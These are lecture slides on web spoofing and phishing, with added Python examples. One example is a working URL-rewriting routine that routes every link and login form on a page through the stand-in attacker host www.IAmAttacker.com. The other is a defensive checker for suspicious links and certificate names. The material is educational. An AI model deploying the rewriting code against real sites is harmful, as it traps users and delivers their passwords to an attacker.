
Web Spoofing

John D. Cook
Andrew Linn

Web huh?

Spoof: a hoax, trick, or deception
Discussed among academics in the 1980's as the concept of IP spoofing
IP spoofing was used in a few early and well-known attacks
IP spoofing fell out of popularity against TCP once initial sequence numbers stopped being predictable (blind spoofing depends on guessing them)
Still done today in different forms
Not all web spoofs are malicious

Phishing

Pronounced "fishing", just much less fun
Broad term for any attempted acquisition of private or sensitive information
Can be a passive attack (bait is set out and the attacker waits) or an active one
Not all phishing attacks are web spoofs
The nature of web spoofs makes them a good choice for phishing, however
Phishing is one example of the many uses of web spoofs

Phishing Spoof Attacks

Fairly common; they are easy and they WORK!!
"Man in the middle" attack: the attacker's server rewrites every URL of a page
http://www.cnn.com becomes http://www.IAmAttacker.com/http://www.cnn.com
Every rewritten link leads back through the attacker, so users can get trapped in the attacker's system

Email Hoaxes

Often a phishing attack as well as a type of spoof
Rely on carelessness or ignorance of the user
Appear to be from a legitimate service
Login IDs, passwords, credit card numbers, and Social Security numbers are the "booty"

Email Hoaxes Cont.

Some serve as a way to implement a web page spoof that is in itself a phishing attack
FSU phishing email hoax
WoW email hoax
I love Firefox
The purpose of the hoax

Spoofs Today

Because everything else was totally last month.
Video games are in. So is stealing them.
The downside of all info stored "server-side".
Online shopping = stolen credit cards. Yes, because us Americans just don't go to the store anymore.

Recognizing Spoofs

Look for the lock at the bottom of your browser, though the lock alone is not proof of a safe website: it only means the connection is encrypted to whoever the certificate names
Use a *good* browser. My ambiguity in that statement allows me to not be biased.
Check the certificate of the page, and that its name is the site you meant to visit
Or just pay attention.

The "Shadow Web"

Known as web spoofing
First examined by Princeton researchers in 1996
Tested in 2002 by researchers at Dartmouth
Traps the user in the attacker's web: every link on every page is rewritten to pass through the attacker's server
Uses JavaScript to rewrite what the browser shows (status bar, location line)
Effectively spoofs the entire Web
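The URL-rewriting step behind the "Phishing Spoof Attacks" and "Shadow Web" slides, as an added example in Python. This is not code from the slides or from the Princeton and Dartmouth papers. www.cnn.com and www.IAmAttacker.com are the slides' own names; the sample page, the _Rewriter class and the spoof_url/rewrite_page functions are constructed here for illustration. It runs offline and performs only the rewrite: a real attack server would also fetch the genuine page and serve the rewritten copy, and the 1996 attack additionally used JavaScript to fake the status and location lines, neither of which is shown.

```python
"""Core of the URL-rewriting ("shadow web") attack described on the slides.

Added example, not code from the original presentation.  It runs offline on
a constructed page and performs only the rewrite step.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin

# Attributes whose value the victim's browser will navigate to or submit to.
URL_ATTRS = {"href", "src", "action"}


def spoof_url(attacker_base, target_url):
    """http://www.cnn.com -> http://www.IAmAttacker.com/http://www.cnn.com"""
    return attacker_base.rstrip("/") + "/" + target_url


class _Rewriter(HTMLParser):
    """Re-emit the page verbatim, except that every URL attribute is first
    resolved against the real page URL and then routed via the attacker."""

    def __init__(self, attacker_base, page_url):
        super().__init__(convert_charrefs=False)
        self.attacker_base = attacker_base
        self.page_url = page_url
        self.out = []

    def _tag(self, tag, attrs, self_closing):
        parts = [tag]
        for name, value in attrs:
            if value is None:  # boolean attribute such as <input disabled>
                parts.append(name)
                continue
            if name.lower() in URL_ATTRS and not value.startswith(("#", "javascript:", "mailto:")):
                # Resolving "/login" to "http://www.cnn.com/login" first means a
                # relative link can never lead the victim back out of the trap.
                value = spoof_url(self.attacker_base, urljoin(self.page_url, value))
            parts.append('%s="%s"' % (name, value))
        self.out.append("<" + " ".join(parts) + (" />" if self_closing else ">"))

    def handle_starttag(self, tag, attrs):
        self._tag(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        self._tag(tag, attrs, True)

    def handle_endtag(self, tag):
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append("&%s;" % name)

    def handle_charref(self, name):
        self.out.append("&#%s;" % name)

    def handle_comment(self, data):
        self.out.append("<!--%s-->" % data)

    def handle_decl(self, decl):
        self.out.append("<!%s>" % decl)


def rewrite_page(html, attacker_base, page_url):
    """Return html with every link, image and form routed through attacker_base."""
    r = _Rewriter(attacker_base, page_url)
    r.feed(html)
    r.close()
    return "".join(r.out)


# Constructed stand-in for the page the attacker fetched from the real site.
SAMPLE_PAGE = (
    '<html><body>'
    '<a href="http://www.cnn.com/world">World</a> '
    '<a href="/login">Log in</a> <a href="#top">Top</a>'
    '<form action="https://www.cnn.com/search" method="get"><input name="q"></form>'
    '</body></html>'
)

if __name__ == "__main__":
    print(rewrite_page(SAMPLE_PAGE, "http://www.IAmAttacker.com", "http://www.cnn.com/"))
```

Run it and every href and action in the output starts with http://www.IAmAttacker.com/. That prefix is the trap: nothing the victim clicks or submits reaches the real site without passing through the attacker first, so a login form filled in on the rewritten page delivers the password to www.IAmAttacker.com before it is forwarded. Seen from the defender's side, a complete URL sitting inside another URL's path is the thing to look for.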

Sample fake tool bar pop-up

Sample true tool bar pop-up

Courtesy of Dartmouth College

Fake SSL warning window

True SSL warning window

Courtesy of Dartmouth College

The "Shadow Web"

While plausible, it is unlikely
High yield, but huge effort
The variety of browsers, user customization, and security software options keep it from being a viable attack
Acts as a man-in-the-middle attack

"Shadow Web" Demonstration

Courtesy of Felten et al., Princeton University

The "Shadow Web": Attacks

Simple surveillance -> phishing attacks
Data manipulation -> man-in-the-middle

The "Shadow Web": Detection

Disable JavaScript (so the status bar and location line cannot be faked)
Customize the browser (a spoofed window has to guess what yours looks like)
Pop-up and spam blockers
Firewalls and other security software

Computer Security Dilemma

Most spoof attacks are user initiated
Hard to prevent from the computer security side
Security software falls short of user ignorance
Broad audience uninformed

Detection and Prevention

Understand what will and will not be requested in an email
Do not follow email links to edit account information. Instead, type the website's URL into the browser yourself
Verify a URL before clicking on a link
Check the SSL certificate of a website, and that its name is the site you intended, before disclosing personal information
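Two of the checks from the "Recognizing Spoofs" and "Detection and Prevention" slides, "verify a URL before clicking on a link" and "check the SSL certificate before disclosing personal information", as an added Python example. This is not code from the slides. The link strings, anchor texts, the KNOWN_BRANDS list, the hosts 10.0.0.5, paypa1.com and attacker.example, and the two certificate dictionaries are all constructed for illustration; the dictionaries are shaped like what ssl.SSLSocket.getpeercert() returns but are not real certificates, so the code runs offline.

```python
"""Link and certificate checks for "verify a URL before clicking" and
"check the SSL certificate before disclosing personal information".

Added example, not code from the original slides.  All inputs below are
constructed for illustration and nothing touches the network.
"""
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed list of sites whose login pages a user might be lured to.
KNOWN_BRANDS = ("cnn.com", "paypal.com", "fsu.edu")

# Something that looks like a host name inside anchor text or a displayed URL.
_HOST_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


def _is_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def _same_site(host, site):
    """host is site itself or a subdomain of it."""
    return host == site or host.endswith("." + site)


def _deconfuse(host):
    """Undo common look-alike substitutions (paypa1 -> paypal, rn -> m, vv -> w)."""
    return host.replace("1", "l").replace("0", "o").replace("rn", "m").replace("vv", "w")


def link_warnings(href, shown_text=""):
    """Reasons a link deserves a second look before it is followed.
    shown_text is the anchor text (or the URL) the e-mail displays for it.
    An empty list means none of the checks fired, not that the link is safe."""
    warnings = []
    u = urlparse(href)
    host = (u.hostname or "").lower()
    if u.scheme not in ("http", "https"):
        warnings.append("unexpected scheme %r" % u.scheme)
    # A whole URL inside the path is the signature of the rewriting proxy:
    # http://www.IAmAttacker.com/http://www.cnn.com goes to IAmAttacker, not CNN.
    if "://" in u.path:
        warnings.append("another URL embedded in the path; real host is " + host)
    # http://www.paypal.com@10.0.0.5/ : the browser ignores everything before '@'.
    if "@" in u.netloc:
        warnings.append("user-info before '@'; real host is " + host)
    if host and _is_ip(host):
        warnings.append("raw IP address instead of a domain name")
    # Anchor text that names a site the link does not actually go to.
    m = _HOST_IN_TEXT.search(shown_text)
    if m:
        shown = m.group(1).lower()
        if not (_same_site(host, shown) or _same_site(shown, host)):
            warnings.append("link text says %s but link goes to %s" % (shown, host))
    # paypa1.com, cnn.c0m, www.cnn.com.attacker.example: resembles a brand, is not it.
    for brand in KNOWN_BRANDS:
        if _same_site(host, brand):
            continue
        if brand in host or _same_site(_deconfuse(host), brand):
            warnings.append("resembles %s but is a different site" % brand)
    return warnings


def _name_matches(pattern, hostname):
    """RFC 6125 style matching: '*' only as the entire left-most label,
    matching exactly one label, and never covering a whole domain ('*.com')."""
    pattern, hostname = pattern.lower().rstrip("."), hostname.lower().rstrip(".")
    if pattern == hostname:
        return True
    if not pattern.startswith("*."):
        return False
    labels = hostname.split(".")
    return len(labels) >= 3 and ".".join(labels[1:]) == pattern[2:]


def cert_matches_host(cert, hostname):
    """cert is a dict shaped like ssl.SSLSocket.getpeercert().  Only DNS
    subjectAltName entries count; a bare commonName is not enough."""
    dns_names = [v for kind, v in cert.get("subjectAltName", ()) if kind == "DNS"]
    return any(_name_matches(n, hostname) for n in dns_names)


# Constructed certificates: what the lock icon on each site actually vouches for.
CERT_ATTACKER = {
    "subject": ((("commonName", "www.IAmAttacker.com"),),),
    "subjectAltName": (("DNS", "www.IAmAttacker.com"), ("DNS", "IAmAttacker.com")),
}
CERT_CNN = {
    "subject": ((("commonName", "*.cnn.com"),),),
    "subjectAltName": (("DNS", "*.cnn.com"), ("DNS", "cnn.com")),
}

if __name__ == "__main__":
    for href, text in [
        ("http://www.IAmAttacker.com/http://www.cnn.com", "http://www.cnn.com"),
        ("http://www.paypal.com@10.0.0.5/login", "PayPal"),
        ("https://www.paypa1.com/login", ""),
        ("https://www.cnn.com/account", "www.cnn.com"),
    ]:
        print(href, "->", link_warnings(href, text) or "no warnings")
    # A valid certificate lights the lock, but it is not cnn.com's certificate.
    print(cert_matches_host(CERT_ATTACKER, "www.cnn.com"), cert_matches_host(CERT_CNN, "www.cnn.com"))
```

cert_matches_host is the part of the job the lock icon does not do for you: the attacker's certificate can be perfectly valid and the lock will show, but the names it carries are IAmAttacker.com, not cnn.com. Comparing those names against the site you meant to reach is the check the slides ask the user to make, and link_warnings is the same idea applied one step earlier, before the click.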

Sample Email Spoof

Sample Email Spoof

Motivations

Most spoof attacks are phishing attacks
Some serve to smear a company's reputation or hurt its finances with false reports
Others are for fun or political goals
All spoofs, even those that are jokes, have the potential for harm

Brick and Mortar

Virtual world vs. physical
Harder to verify Amazon.com than a brick and mortar store
Security software helps, but an educated user base is the best defense against spoof attacks

Criminal Act

Identity theft is a growing concern
Spoofing is used in many phishing scams to facilitate identity theft
Most attackers use stolen or hacked machines
When caught, attackers must be punished appropriately

Questions?